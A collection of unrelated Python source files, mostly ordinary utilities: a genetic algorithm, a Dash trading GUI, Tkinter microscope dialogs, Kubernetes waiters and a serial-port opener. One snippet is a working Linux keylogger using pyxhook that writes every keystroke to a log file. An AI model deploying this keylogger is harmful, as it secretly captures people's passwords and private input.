    dict
        Maps "<mutation_rate>:<generation>" -> best fitness in the
        population, sampled every 10th generation.
    """
    if model == 'steady-state':
        if selection_rate >= 1:
            raise ValueError('selection_rate must be < 1 if model is steady-state')
    else: # generational
        if selection_rate != 1:
            raise ValueError('selection_rate must be 1 if model is generational')
    # Random initial phenotypes, encoded as 32-bit float bit strings.
    phenotypes = np.random.uniform(domain_limits[0], domain_limits[1], [population_size])
    population = list(map(lambda x: float_to_bin(round(x, DEFAULT_PRECISION)), phenotypes))
    results = {}
    for generation in range(1, generations + 1):
        if not generation % 10:
            print('Generation:', generation)
        population_fitness = calc_population_fitness(population)
        # Record the best fitness every 10th generation.
        if not generation % 10:
            results[f"{mutation_rate}:{generation}"] = np.max(population_fitness)
        parents = select_individuals(population, population_fitness, rate=selection_rate)
        elite = select_best_individuals(population, population_fitness, elitism_rate)
        offspring = crossover(parents, rate=crossover_rate)
        offspring = mutation(offspring, rate=mutation_rate)
        # Creating the new population based on the parents and offspring.
        if elite.shape[0]:
            population[0:elite.shape[0]] = elite
        remaining_population_size = (len(population) - parents.shape[0]) - elite.shape[0]
        if remaining_population_size > 0:
            # Not enough offspring to fill the population: pad the middle
            # with randomly re-drawn parents, then append the offspring.
            population[elite.shape[0]: elite.shape[0] + remaining_population_size] = np.random.choice(
                parents[elite.shape[0]:],
                remaining_population_size)
            population[elite.shape[0] + remaining_population_size:] = offspring
        else:
            # More offspring than free slots: keep only as many as fit.
            population[elite.shape[0]:] = \
                offspring[: offspring.shape[0] + remaining_population_size]
    return results
if __name__ == '__main__':
    # Compare three mutation rates under the steady-state model.
    models = ('generational', 'steady-state')
    data = run(100, (-1, 2), generations=200, model=models[1], selection_rate=0.85, elitism_rate=0.01,
               crossover_rate=0.9, mutation_rate=0.01)
    data.update(run(100, (-1, 2), generations=200, model=models[1], selection_rate=0.85, elitism_rate=0.01,
                    crossover_rate=0.9, mutation_rate=0.05))
    data.update(run(100, (-1, 2), generations=200, model=models[1], selection_rate=0.85, elitism_rate=0.01,
                    crossover_rate=0.9, mutation_rate=0.1))
    # Keys look like "<mutation_rate>:<generation>"; split them back out
    # into separate columns for plotting.
    df = pd.DataFrame.from_dict(data, orient="index", columns=["best value in population"])
    df["mutation rate"] = [i.split(":")[0] for i in df.index]
    df["time"] = [int(i.split(":")[1]) for i in df.index]
    print(df.head(100))
    plot_results(df)
| StarcoderdataPython |
1767879 | from modules.file import *
| StarcoderdataPython |
80942 | <gh_stars>0
class Sources:
    """A single news source and its identifying metadata."""

    def __init__(self, id, name, description, url):
        """Store the source's id, name, description and homepage URL."""
        self.id = id
        self.name = name
        self.description = description
        self.url = url
class Articles:
    """A single news article and its display metadata."""

    def __init__(self, author, title, description, url, urlToImage, publishedAt=None):
        """Store the article fields.

        Bug fix: ``publishedAt`` was previously read from an undefined
        name, which raised ``NameError`` on every instantiation; it is now
        an optional parameter defaulting to ``None``.
        """
        self.author = author
        self.title = title
        self.description = description
        self.url = url
        self.urlToImage = urlToImage
        self.publishedAt = publishedAt
| StarcoderdataPython |
4810380 | # -*- coding: utf-8 -*-
"""
"""
import uuid
from rmfriend import exceptions
from rmfriend.content import Content
from rmfriend.pagedata import PageData
from rmfriend.metadata import MetaData
from rmfriend.notebook import Notebook
from rmfriend.lines.notebooklines import NotebookLines
class NotebookOPS(object):
    """Operations that create new notebooks from existing ones."""

    @classmethod
    def new_from_pages(cls, source, pages):
        """Return a new Notebook containing the selected pages of *source*.

        :param source: The source notebook.Notebook instance.
        :param pages: A list of page indices to copy from the source.

        If a page number is not found, exceptions.PageNotFoundError is
        raised.

        :returns: A new notebook.Notebook with the copied pages.
        """
        # Resolve every requested index first so an invalid index aborts
        # the operation before any new-notebook parts are built.
        found_pages = []
        for page_number in pages:
            try:
                found_pages.append(source.lines.pages[page_number])
            except IndexError:
                raise exceptions.PageNotFoundError(
                    "Page not found '{}'".format(page_number)
                )
        return Notebook(
            document_id=str(uuid.uuid4()),
            metadata=MetaData.new(),
            pagedata=PageData.new(),
            content=Content.new(),
            lines=NotebookLines.new(pages=found_pages),
        )
| StarcoderdataPython |
197793 | <filename>traderGUI.py
import json
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
import zmq
from dash.dependencies import Input, Output
from util import *
# Shared trading parameters, edited through the Dash UI and published to
# the trader over ZeroMQ when Submit is clicked.
params = {'ready': 0,
          'posUpperLimit': 0,
          'posLowerLimit': 0,
          'spread': 10.0,
          'buysellSkew': 0.0,
          'alphaMultiplier': 0.0,
          'positionSkew': 0.0}
# Stock Dash example stylesheet for basic layout/typography.
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
def createZmqPublisher():
    """Create and return a ZeroMQ PUB socket bound to the command endpoint.

    NOTE(review): ``commandEndPoint`` comes from the wildcard
    ``from util import *`` -- confirm its value there.
    """
    ctx = zmq.Context()
    pub_socket = ctx.socket(zmq.PUB)
    pub_socket.bind(commandEndPoint)
    return pub_socket
def valueSetter(value, name):
    """Dash callback target: record *value* under key *name* in ``params``."""
    params.update({name: value})
    print(params)  # debug: show the full parameter set after each change
    return 'changed'
def createLayout():
    """Build the Dash page: one labelled input row per parameter, plus a
    submit button and a status div."""
    rows = [
        html.Div([
            html.Div(["{:<20}:".format(key)]),
            dcc.Input(id=key, type='float', value=params[key]),
            # Hidden per-field state div targeted by the per-key callbacks.
            html.Div(id=key + "state", children='ready', style={'display': 'none'}),
        ])
        for key in params
    ]
    controls = [html.Button('Submit', id='submit-val', n_clicks=0), html.Div(id='state')]
    return html.Div(rows + controls)
app = dash.Dash(__name__,external_stylesheets=external_stylesheets)
app.layout = createLayout # dynamic layout creation
# Publish the full parameter set over ZeroMQ whenever Submit is clicked.
@app.callback(Output('state', 'children'),
              [Input('submit-val', 'n_clicks')])
def buttonReact(click):
    print("ready")
    # NOTE(review): `commandTopic` comes from 'from util import *' and
    # `pub` is only assigned in the __main__ block -- confirm both are in
    # place before the first click.
    pub.send_string(commandTopic + json.dumps(params))
    print(os.getpid())
    return str(params)
# Register one callback per parameter so edits are stored immediately.
for key in params:
    app.callback(Output(component_id=key + 'state', component_property='children'),
                 [Input(component_id=key, component_property='value'),
                  Input(component_id=key, component_property='id')])(valueSetter)
if __name__ == '__main__':
    pub = createZmqPublisher()
    app.run_server(debug=False, threaded=True, host='0.0.0.0')
| StarcoderdataPython |
3376198 | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 9 08:49:09 2018
@author: TIM
"""
import tkinter as tk
from tkinter import simpledialog
from tkinter.filedialog import askdirectory
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import askopenfile
from tkinter import messagebox
from PIL import ImageTk, Image
#import Stage.maerzhaeuser as st
import time
import numpy as np
class MyDialog(simpledialog.Dialog):
    """Modal dialog asking the user for an (x, y) position in sample coordinates.

    After the dialog closes, ``self.result`` holds the raw entry strings
    under the keys ``'x_sample'`` and ``'y_sample'``.
    """

    def body(self, master):
        """Create two labelled entry fields (called by simpledialog.Dialog)."""
        for row, caption in enumerate(("x-Pos. in Sample Coord:", "y-Pos. in Sample Coord:")):
            tk.Label(master, text=caption).grid(row=row)
        self.e1 = tk.Entry(master, width=50)
        self.e2 = tk.Entry(master, width=50)
        self.e1.grid(row=0, column=1)
        self.e2.grid(row=1, column=1)

    def apply(self):
        """Collect the entry contents into ``self.result`` (called on OK)."""
        self.result = {'x_sample': self.e1.get(), 'y_sample': self.e2.get()}
class UserInterfaceCallBack():
'''
This class is used to have instant feedback on the screen when moving
stage or microscope.
'''
def __init__(self, GB):
self.GB = GB
self.cancel = False
def get_focuspos_3vector(self, prompt_text):
'''
This function asks the user to move a little bit away from the edge
and focus manually. When pressing OK the function ends.
'''
def up50():
self.GB.microscope.moveZRelative(50)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def down50():
self.GB.microscope.moveZRelative(-50)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def up5():
self.GB.microscope.moveZRelative(10)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def down5():
self.GB.microscope.moveZRelative(-10)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
def ok():
root.destroy()
root.quit()
return
def on_closing():
root.destroy()
root.quit()
self.cancel = True
return
self.cancel = False
root = tk.Tk()
root.geometry("239x113+450+400")
root.attributes("-topmost", True)
root.title('Focus Manually')
frame = tk.Frame(root)
frame.grid(row=0)
message = tk.Label(frame)
message.config(text=prompt_text)
message.grid(row=1, columnspan=4)
prompt = tk.Label(frame)
prompt.config(text='{z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
prompt.grid(row=2, column=1)
DOWN50_button = tk.Button(frame, text='--', width=10, command=down50)
DOWN50_button.grid(row=2, column=0)#, columnspan=2)
UP50_button = tk.Button(frame, text='++', width=10, command=up50)
UP50_button.grid(row=2, column=2)#, columnspan=2)
DOWN5_button = tk.Button(frame, text='-', width=10, command=down5)
DOWN5_button.grid(row=3, column=0)#, columnspan=2)
UP5_button = tk.Button(frame, text='+', width=10, command=up5)
UP5_button.grid(row=3, column=2)#, columnspan=2)
OK_button= tk.Button(frame, text='OK', width=10, command=ok)
OK_button.grid(row=4, column=1)#, columnspan=2)
root.protocol("WM_DELETE_WINDOW", on_closing)
tk.mainloop()
def focusing_and_changing_objectives_manually(self, prompt_text):
'''
This function lets the user change the objective and focus manually.
'''
def up50():
self.GB.microscope.moveZRelative(50)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def down50():
self.GB.microscope.moveZRelative(-50)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def up5():
self.GB.microscope.moveZRelative(10)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def down5():
self.GB.microscope.moveZRelative(-10)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
def objm():
self.GB.microscope.moveObjectiveBackwards()
objective.config(text='Obj: {obj}x'.format(obj = str(self.GB.microscope.getCurrentObjective())))
objective.grid(row=3, column=1)
def objp():
self.GB.microscope.moveObjectiveForward()
objective.config(text='Obj: {obj}x'.format(obj = str(self.GB.microscope.getCurrentObjective())))
objective.grid(row=3, column=1)
def cancel():
root.destroy()
root.quit()
self.cancel = True
return
self.cancel = False
root = tk.Tk()
root.geometry("239x113+450+400")
root.attributes("-topmost", True)
root.title('Focus Manually')
frame = tk.Frame(root)
frame.grid(row=0)
message = tk.Label(frame)
message.config(text=prompt_text)
message.grid(row=1, columnspan=4)
z_value = tk.Label(frame)
z_value.config(text='Pos: {z}'.format(z = str(int(np.floor(self.GB.microscope.getZPosition()/20)))))
z_value.grid(row=2, column=1)
objective = tk.Label(frame)
objective.config(text='Obj: {obj}x'.format(obj = str(self.GB.microscope.getCurrentObjective())))
objective.grid(row=3, column=1)
DOWN50_button = tk.Button(frame, text='--', width=10, command=down50)
DOWN50_button.grid(row=2, column=0)#, columnspan=2)
UP50_button = tk.Button(frame, text='++', width=10, command=up50)
UP50_button.grid(row=2, column=2)#, columnspan=2)
DOWN5_button = tk.Button(frame, text='-', width=10, command=down5)
DOWN5_button.grid(row=3, column=0)#, columnspan=2)
UP5_button = tk.Button(frame, text='+', width=10, command=up5)
UP5_button.grid(row=3, column=2)#, columnspan=2)
OBJM_button= tk.Button(frame, text='Obj-', width=10, command=objm)
OBJM_button.grid(row=4, column=0)#, columnspan=2)
OBJP_button= tk.Button(frame, text='Obj+', width=10, command=objp)
OBJP_button.grid(row=4, column=2)#, columnspan=2)
CANCEL_button= tk.Button(frame, text='Cancel', width=10, command=cancel)
CANCEL_button.grid(row=4, column=1)#, columnspan=2)
root.protocol("WM_DELETE_WINDOW", cancel)
tk.mainloop()
def reload_sample(self, edge1, edge2):
'''
This functions takes two tuples (which are the edges SW, SE)
and then opens a userinterface which gives the user the opportunity to
load a txt file (with 12 positions each) and move to these positions by
button click.
Parameters
----------
edge1: tuple
coordinates of edge SW
edge2: tuple
coordinates of edge SE
'''
self.cancel = False
self.filepath = None
self.positions = None
def goTo1():
if len(self.positions)>0:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[0][1],
self.positions[0][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo2():
if len(self.positions)>1:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[1][1],
self.positions[1][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo3():
if len(self.positions)>2:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[2][1],
self.positions[2][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo4():
if len(self.positions)>3:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[3][1],
self.positions[3][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo5():
if len(self.positions)>4:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[4][1],
self.positions[4][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo6():
if len(self.positions)>5:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[5][1],
self.positions[5][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo7():
if len(self.positions)>6:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[6][1],
self.positions[6][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo8():
if len(self.positions)>7:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[7][1],
self.positions[7][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo9():
if len(self.positions)>8:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[8][1],
self.positions[8][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo10():
if len(self.positions)>9:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[9][1],
self.positions[9][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo11():
if len(self.positions)>10:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[10][1],
self.positions[10][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo12():
if len(self.positions)>11:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[11][1],
self.positions[11][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def on_closing():
self.cancel = True
root.destroy()
root.quit()
return
def load():
self.positions = None
try:
self.filepath = askopenfile().name
print(self.filepath)
except:
return
print(self.filepath)
txt_file_name = self.filepath
with open(txt_file_name) as f:
lines = f.readlines()
lines = [line.rstrip('\n') for line in open(txt_file_name)]
self.positions = [[] for i in range(len(lines))]
for i in range(len(lines)):
lines[i] = lines[i].split(' ')
for j in range(len(lines[i])):
if lines[i][j] != '':
self.positions[i].append(float(lines[i][j]))
for i in range(12):
tk.Label(mainframe, text=' ').grid(row = i+1, column = 0)
tk.Label(mainframe, text=' ').grid(row = i+1, column = 1)
tk.Label(mainframe, text=' ').grid(row = i+1, column = 2)
if i < len(lines):
tk.Label(mainframe, text=int(self.positions[i][0])).grid(row = i+1, column = 0)
tk.Label(mainframe, text=self.positions[i][1]).grid(row = i+1, column = 1)
tk.Label(mainframe, text=self.positions[i][2]).grid(row = i+1, column = 2)
return
root = tk.Tk()
root.title("Visit good Flakes")
# Add a grid
mainframe = tk.Frame(root)
mainframe.grid(row=0)
# add coordinates
tk.Label(mainframe, text="Pos").grid(row = 0, column = 0)
tk.Label(mainframe, text="X").grid(row = 0, column = 1)
tk.Label(mainframe, text="Y").grid(row = 0, column = 2)
load_button = tk.Button(mainframe, text='Load .txt file', command=load)
load_button.grid(row=0, column=3)#, columnspan=2)
button_pos1 = tk.Button(mainframe, text='->', command=goTo1)
button_pos2 = tk.Button(mainframe, text='->', command=goTo2)
button_pos3 = tk.Button(mainframe, text='->', command=goTo3)
button_pos4 = tk.Button(mainframe, text='->', command=goTo4)
button_pos5 = tk.Button(mainframe, text='->', command=goTo5)
button_pos6 = tk.Button(mainframe, text='->', command=goTo6)
button_pos7 = tk.Button(mainframe, text='->', command=goTo7)
button_pos8 = tk.Button(mainframe, text='->', command=goTo8)
button_pos9 = tk.Button(mainframe, text='->', command=goTo9)
button_pos10 = tk.Button(mainframe, text='->', command=goTo10)
button_pos11 = tk.Button(mainframe, text='->', command=goTo11)
button_pos12 = tk.Button(mainframe, text='->', command=goTo12)
button_pos1.grid(row=1, column=3)#, columnspan=2)
button_pos2.grid(row=2, column=3)#, columnspan=2)
button_pos3.grid(row=3, column=3)#, columnspan=2)
button_pos4.grid(row=4, column=3)#, columnspan=2)
button_pos5.grid(row=5, column=3)#, columnspan=2)
button_pos6.grid(row=6, column=3)#, columnspan=2)
button_pos7.grid(row=7, column=3)#, columnspan=2)
button_pos8.grid(row=8, column=3)#, columnspan=2)
button_pos9.grid(row=9, column=3)#, columnspan=2)
button_pos10.grid(row=10, column=3)#, columnspan=2)
button_pos11.grid(row=11, column=3)#, columnspan=2)
button_pos12.grid(row=12, column=3)#, columnspan=2)
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
class UserInterface(object):
    """Tk dialog helpers used to configure and drive the scanning workflow.

    Holds the user's choices: ``cancel`` (dialog was cancelled), ``filepath``
    (picture output folder), and after :meth:`call_initial_program_start`
    also ``mag`` (magnification as an int) and ``ovlap`` (overlap fraction).
    """

    def __init__(self):
        # True whenever the user cancels a dialog; callers check this flag.
        self.cancel = False
        # Folder chosen by the user for storing pictures.
        self.filepath = None

    def message_box(self, text):
        '''
        Show a messagebox with OK and Cancel displaying *text*.

        Sets ``self.cancel = True`` when the user cancels the window.

        Parameters
        ----------
        text: string
            The text which will be displayed.
        '''
        root = tk.Tk()
        root.attributes("-topmost", True)
        root.withdraw()
        # askokcancel returns True for OK, False for Cancel/close.
        self.cancel = not messagebox.askokcancel("Information", text)

    def message_box_only(self, text):
        '''
        Show an information messagebox (OK only) displaying *text*.

        Parameters
        ----------
        text: string
            The text which will be displayed.
        '''
        root = tk.Tk()
        root.attributes("-topmost", True)
        root.withdraw()
        messagebox.showinfo("Information", text)

    def enter_sample_coordinates(self):
        '''
        Open a dialog where the user enters two numbers, the x- and y-value
        in sample coordinates, and return them.

        Returns
        -------
        x_sample: float
            x-value given by the user's input (None if cancelled).
        y_sample: float
            y-value given by the user's input (None if cancelled).
        '''
        root = tk.Tk()
        root.attributes("-topmost", True)
        root.title('Enter Sample Coordinates')
        root.withdraw()
        # MyDialog is defined elsewhere in this module; its .result is a dict
        # with 'x_sample'/'y_sample', or None when the dialog was cancelled.
        d = MyDialog(root)
        result = d.result
        root.destroy()
        if result is None:
            return None, None
        return result['x_sample'], result['y_sample']

    def call_startup_message_boxes(self):
        """Ask the user for the picture output folder; store it in self.filepath."""
        self.message_box('Press \'OK\' and select a folder in which the '
                         'pictures should be stored. It should '
                         'not be on a network drive!')
        if self.cancel:
            return
        root_file_diag = tk.Tk()
        root_file_diag.withdraw()
        self.filepath = askdirectory()
        root_file_diag.destroy()
        root_file_diag.quit()

    def call_initial_program_start(self):
        '''
        Show a menu in which the user sets a magnification (10x, 20x or 50x)
        and an overlap in % (between 1 and 99) for the scan.  The values are
        stored in ``self.mag`` (int) and ``self.ovlap`` (fraction, 0.01-0.99).
        Closing the window sets ``self.cancel``.
        '''
        self.cancel = False
        self.mag = None
        self.ovlap = None

        def on_closing():
            # Closing the window counts as cancelling the whole run.
            self.cancel = True
            root.destroy()
            root.quit()

        def ok():
            # Validate both inputs; keep the window open until they are valid.
            self.mag = tkvar_mag.get()
            if self.mag == '':
                self.mag = None
                self.ovlap = None
                self.message_box_only('Please set both, a magnification and an overlap in %')
                return
            self.mag = int(self.mag[:-1])  # '10x' -> 10
            try:
                self.ovlap = float(overlap.get())
            except ValueError:
                self.message_box_only('Please enter a number between 1 and 99 for the overlap in %')
                return
            if self.ovlap < 1 or self.ovlap > 99:
                self.message_box_only('Please enter a number between 1 and 99 for the overlap in %')
                return
            self.ovlap /= 100.
            root.destroy()
            root.quit()

        root = tk.Tk()
        root.title("Getting started - Settings for scan")
        mainframe = tk.Frame(root)
        mainframe.grid(row=0)
        tkvar_mag = tk.StringVar(root)
        # A tuple (not a set, as before) so the menu order is deterministic.
        magnification = ('10x', '20x', '50x')
        tkvar_mag.set('10x')
        popupMenu_mag = tk.OptionMenu(mainframe, tkvar_mag, *magnification)
        overlap = tk.Entry(mainframe, width=6)
        tk.Label(mainframe, text="Set magnification").grid(row=1, column=0)
        tk.Label(mainframe, text="Set overlap in %").grid(row=1, column=2)
        popupMenu_mag.grid(row=2, column=0)
        overlap.grid(row=2, column=2)
        root.protocol("WM_DELETE_WINDOW", on_closing)
        OK_button = tk.Button(mainframe, text='OK', width=10, command=ok)
        OK_button.grid(row=4, column=1)
        root.mainloop()
if __name__ == "__main__":
    # Ad-hoc manual test harness.
    UI = UserInterface()
    # UI.call_initial_program_start()
    # NOTE(review): UserInterface defines no reload_sample() method (the
    # implementation above is commented out), so this call raises
    # AttributeError as the file stands -- confirm intent.
    UI.reload_sample()
    print(UI.cancel)
    print(UI.positions)
    # UI.test_ask_file()
    # UICB = UserInterfaceCallBack()
    # UICB.focusing_and_changing_objectives_manually('Hello')
    # UI.message_box('Hello')
    # filepath = UI.get_filepath()
    # pos1, pos2, pos3 = UI.get_edge_points()
    # print(filepath)
    # print(pos1,pos2,pos3)
    # UI.good_focus_area()
    # UI.message_box("Hello")
| StarcoderdataPython |
"""
Configuration for model.
"""
from __future__ import annotations
import json
from pathlib import Path
from typing import TypedDict
filename = "config.json"
class ConfigData(TypedDict):
    """Schema of the JSON configuration file handled by ``read``/``store``."""

    # Number of iterations -- exact semantics defined by the consuming model.
    iterations: int
    # Window size -- presumably a sliding-window length; confirm with callers.
    window_size: int
def read(path: Path) -> ConfigData:
    """Load the configuration file found under *path* and return its contents."""
    config_file = path / filename
    with config_file.open("r", encoding="utf-8") as handle:
        loaded: ConfigData = json.load(handle)
    return loaded
def store(data: ConfigData, path: Path) -> None:
    """Serialize *data* as JSON into the configuration file under *path*."""
    target = path / filename
    with target.open("w", encoding="utf-8") as handle:
        json.dump(data, handle)
| StarcoderdataPython |
186992 | <reponame>YaguangZhang/EarsMeasurementCampaignCode
# Open a serial port even if it's currently occupied.
#
# <NAME>, Purdue University, 2017-06-13
import serial
def openPort(p="COM5", b=9600, t=1):
    """Open serial port *p*, retrying once via close/reopen if it is held.

    Parameters
    ----------
    p : str
        Port name, e.g. "COM5".
    b : int
        Baud rate.
    t : int or float
        Read timeout in seconds.

    Returns
    -------
    serial.Serial
        The opened port object.

    Raises
    ------
    Exception
        Re-raises the underlying error when the port cannot be opened at all.
    """
    ser = None
    try:
        # pyserial opens the port in the constructor when ``port`` is given.
        ser = serial.Serial(port=p, baudrate=b, timeout=t)
        print("Port " + p + " is successfully opened!")
        return ser
    except IOError:
        if ser is None:
            # The constructor itself failed, so there is no object to
            # close/reopen.  (The original code hit a NameError here by
            # calling ser.close() on the never-assigned variable.)
            print("Failed in opening Port " + p + "!")
            raise
        try:
            # We got a port object but it is in a bad state: close and reopen.
            ser.close()
            ser.open()
            print("Port " + p + " was already open... Successfully closed & reopened!")
            return ser
        except Exception as e:
            print("Failed in opening Port " + p + "!")
            print(e)
            raise
3297593 | <gh_stars>10-100
#!python
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import sys
import os
import re
import time
import dpath.util
import requests
from kubernetes import client, config, watch
def kube_v1():
    """Return a Kubernetes CoreV1Api client, or None when no config is found."""
    # In-cluster: this env var is injected by Kubernetes into every pod.
    # XXX: is there a better way to check if we are inside a cluster or not?
    if "KUBERNETES_SERVICE_HOST" in os.environ:
        # If loading the in-cluster config raises (it shouldn't), we crash and
        # Kubernetes kills the pod -- an acceptable outcome.
        config.load_incluster_config()
        return client.CoreV1Api()

    # Outside a cluster (e.g. in docker) a kubeconfig may be absent; that's OK.
    try:
        config.load_kube_config()
        return client.CoreV1Api()
    except FileNotFoundError:
        # Meh, just ride through without an API client.
        print("No K8s")
        return None
class Waitable (object):
    """Base class for things that can be polled until they become ready.

    Subclasses must implement :meth:`check` and override ``name`` and
    ``not_ready`` (the subclasses in this file use ``@property`` for the
    latter two, since :meth:`wait` reads them as attributes).
    """

    def __init__(self, retries=60, delay=2):
        # Total number of polls attempted per wait() call.
        self.retries = retries
        # Polls left in the current wait() call (updated as wait() runs).
        self.remaining = 0
        # Seconds to sleep between polls.
        self.delay = delay

    def check(self):
        """Return True when the awaited condition holds (subclass hook)."""
        raise NotImplementedError("You need to subclass Waitable and customize check, name, and not_ready")

    def name(self):
        raise NotImplementedError("You need to subclass Waitable and customize check, name, and not_ready")

    def not_ready(self):
        raise NotImplementedError("You need to subclass Waitable and customize check, name, and not_ready")

    def wait(self, retries=None, delay=None):
        """Poll check() until it returns True or retries run out.

        Returns True if check() ever succeeded, False otherwise.  A falsy
        ``retries``/``delay`` argument falls back to the constructor values.
        """
        self.remaining = retries if retries else self.retries
        if not delay:
            delay = self.delay

        good = False
        while self.remaining > 0:
            self.remaining -= 1

            if self.check():
                good = True
                break

            print("%s remaining %02d: %s" % (self.name, self.remaining, self.not_ready))
            time.sleep(delay)

        return good
class WaitForPods (Waitable):
    """Waits until every pod in a namespace reports phase ``Running``."""

    def __init__(self, namespace="default", **kwargs):
        super(WaitForPods, self).__init__(**kwargs)
        # -1 means "no check has run yet" (distinguished in not_ready).
        self.pending = -1
        self.namespace = namespace
        # May be None outside a cluster; check() would then fail loudly.
        self.k8s_api = kube_v1()

    @property
    def name(self):
        return "WaitForPods"

    @property
    def not_ready(self):
        if self.pending < 0:
            return "no pods being checked"
        else:
            return "%d not running" % self.pending

    def check(self):
        """Count non-Running pods; ready when none remain.

        BUG FIX: the namespace was previously hard-coded to "default",
        silently ignoring the ``namespace`` constructor argument.
        """
        self.pending = 0

        for pod in self.k8s_api.list_namespaced_pod(self.namespace).items:
            if pod.status.phase != "Running":
                self.pending += 1

        return self.pending == 0
class WaitForURL (Waitable):
    """Waits until an HTTP GET on a URL succeeds and the body matches a regex."""

    def __init__(self, url, expected, name=None, not_ready="not yet ready", **kwargs):
        super(WaitForURL, self).__init__(**kwargs)
        self.url = url
        # Pattern the response body must contain for check() to succeed.
        self.expected = re.compile(expected)
        self._name = name
        self._not_ready = not_ready

    @property
    def name(self):
        return self._name if self._name else "WaitForURL"

    @property
    def not_ready(self):
        return self._not_ready

    def check(self):
        """GET the URL; True only on a 2xx response whose body matches."""
        try:
            result = requests.get(self.url)
        except requests.RequestException as err:
            # A connection failure just means "not ready yet".  Previously the
            # exception escaped and aborted the whole wait() loop.
            print("%s: GET failed (%s)" % (self.name, err))
            return False

        if (result.status_code // 100) != 2:
            print("%s: GET failed (%d)" % (self.name, result.status_code))
            return False

        text = result.text

        if self.expected.search(text):
            print("%s: Matched on '%s'" % (self.name, text))
            return True
        else:
            print("%s: no match on '%s'" % (self.name, text))
            return False
if __name__ == "__main__":
    # CLI smoke test: argv[1] = URL to poll, argv[2] = regex the body must match.
    if WaitForURL(sys.argv[1], sys.argv[2]).wait():
        print("Everything OK")
    else:
        print("Uhoh")
"""
Copyright (c) 2015, <NAME>
All rights reserved.
A simple keylogger witten in python for linux platform
All keystrokes are recorded in a log file.
The program terminates when grave key(`) is pressed
grave key is found below Esc key
"""
import pyxhook
#change this to your log file's path
log_file='/home/aman/Desktop/file.log'
#this function is called everytime a key is pressed.
#this function is called everytime a key is pressed.
def OnKeyPress(event):
    """Hook callback: append the key's name to the log file; the grave key stops the hook."""
    # NOTE(review): the file is reopened on every keystroke and only closed on
    # the grave key (relies on refcounting otherwise).
    fob=open(log_file,'a')
    fob.write(event.Key)
    fob.write('\n')
    if event.Ascii==96: #96 is the ascii value of the grave key (`)
        fob.close()
        new_hook.cancel()
# Module-level wiring: create the hook, register the callback, and start it.
#instantiate HookManager class
new_hook=pyxhook.HookManager()
#listen to all keystrokes
new_hook.KeyDown=OnKeyPress
#hook the keyboard
new_hook.HookKeyboard()
#start the session (blocks until the grave key cancels the hook)
new_hook.start()
| StarcoderdataPython |
4830286 | <reponame>deepyaman/NVTabular
import os
import subprocess
from shutil import copyfile
import cudf
import tritonclient.http as httpclient
from google.protobuf import text_format
from tritonclient.utils import np_to_triton_dtype
# read in the triton ModelConfig proto object - generating it if it doesn't exist
try:
    import nvtabular.inference.triton.model_config_pb2 as model_config
except ImportError:
    # Generated module is missing: compile model_config.proto (located next to
    # this file) with protoc, then retry the import.
    pwd = os.path.dirname(__file__)
    try:
        subprocess.check_output(
            ["protoc", f"--python_out={pwd}", f"--proto_path={pwd}", "model_config.proto"]
        )
